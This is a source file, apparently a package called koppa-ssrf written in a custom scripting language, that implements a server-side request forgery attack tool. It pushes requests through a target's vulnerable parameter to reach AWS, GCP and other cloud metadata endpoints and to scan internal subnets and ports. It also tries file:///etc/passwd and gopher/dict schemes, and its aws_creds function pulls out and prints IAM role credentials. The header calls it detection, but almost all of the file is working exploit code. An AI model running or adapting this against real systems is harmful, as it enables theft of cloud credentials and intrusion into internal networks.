## koppa package: koppa-ssrf
## version: 1.0.0
## description: SSRF detection — internal scan, cloud metadata, protocol smuggling
## author: KOPPA-OS
## tags: web, ssrf, cloud, aws, gcp

import net, log, sys

let CLOUD_META = [
    "http://169.254.169.254/latest/meta-data/",
    "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
    "http://metadata.google.internal/computeMetadata/v1/",
    "http://169.254.169.254/metadata/v1/",
    "http://100.100.100.200/latest/meta-data/",
    "http://192.168.0.1/",
    "http://10.0.0.1/",
    "http://172.16.0.1/"
]
let PROTOCOLS = ["file:///etc/passwd", "gopher://", "dict://", "ftp://"]

fn scan(url, param) {
    log.info("[*] SSRF scan: " + url)
    let found = []
    for target in CLOUD_META {
        let resp = net.http_get(url + "?" + param + "=" + net.url_encode(target))
        if resp.body.contains("ami-id") or resp.body.contains("instance-id")
           or resp.body.contains("computeMetadata") or resp.status == 200 {
            log.ok("[+] SSRF → cloud metadata!  URL: " + target)
            log.muted(resp.body[:500])
            found.push(target)
        }
    }
    if found.len() == 0 { log.muted("[-] No SSRF found via metadata") }
    return found
}

fn internal_scan(url, param, subnet, ports) {
    log.info("[*] SSRF internal scan: " + subnet + ".x")
    let open = []
    for i in sys.range(1, 255) {
        let ip = subnet + "." + i.to_str()
        for port in (ports or [80, 443, 22, 8080, 8443, 3306]) {
            let target = "http://" + ip + ":" + port.to_str() + "/"
            let resp   = net.http_get(url + "?" + param + "=" + net.url_encode(target))
            if resp.status != 0 and resp.body.len() > 0 {
                log.ok("[+] Internal host: " + ip + ":" + port.to_str())
                open.push({ ip: ip, port: port })
            }
        }
    }
    return open
}

fn protocol_test(url, param) {
    log.info("[*] SSRF protocol test...")
    for proto in PROTOCOLS {
        let resp = net.http_get(url + "?" + param + "=" + net.url_encode(proto))
        if resp.status == 200 and resp.body.len() > 0 {
            log.ok("[+] Protocol allowed: " + proto)
            log.muted(resp.body[:300])
        }
    }
}

fn aws_creds(url, param) {
    log.info("[*] Extracting AWS credentials via SSRF...")
    let role_url = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
    let resp1 = net.http_get(url + "?" + param + "=" + net.url_encode(role_url))
    let role  = resp1.body.trim()
    if role == "" { log.err("[-] No IAM role found"); return }
    log.ok("[+] IAM Role: " + role)
    let cred_url = role_url + role
    let resp2 = net.http_get(url + "?" + param + "=" + net.url_encode(cred_url))
    log.ok("[+] AWS Credentials:\n" + resp2.body)
}

fn main(args) {
    log.info("[koppa-ssrf] SSRF Tester v1.0")
    let url   = args[0] or sys.prompt("URL: ")
    let param = args[1] or sys.prompt("Parameter: ")
    let mode  = args[2] or "scan"
    if mode == "scan"     { scan(url, param) }
    if mode == "internal" {
        let subnet = args[3] or sys.prompt("Subnet prefix (e.g. 192.168.1): ")
        internal_scan(url, param, subnet, [])
    }
    if mode == "proto"    { protocol_test(url, param) }
    if mode == "aws"      { aws_creds(url, param) }
}
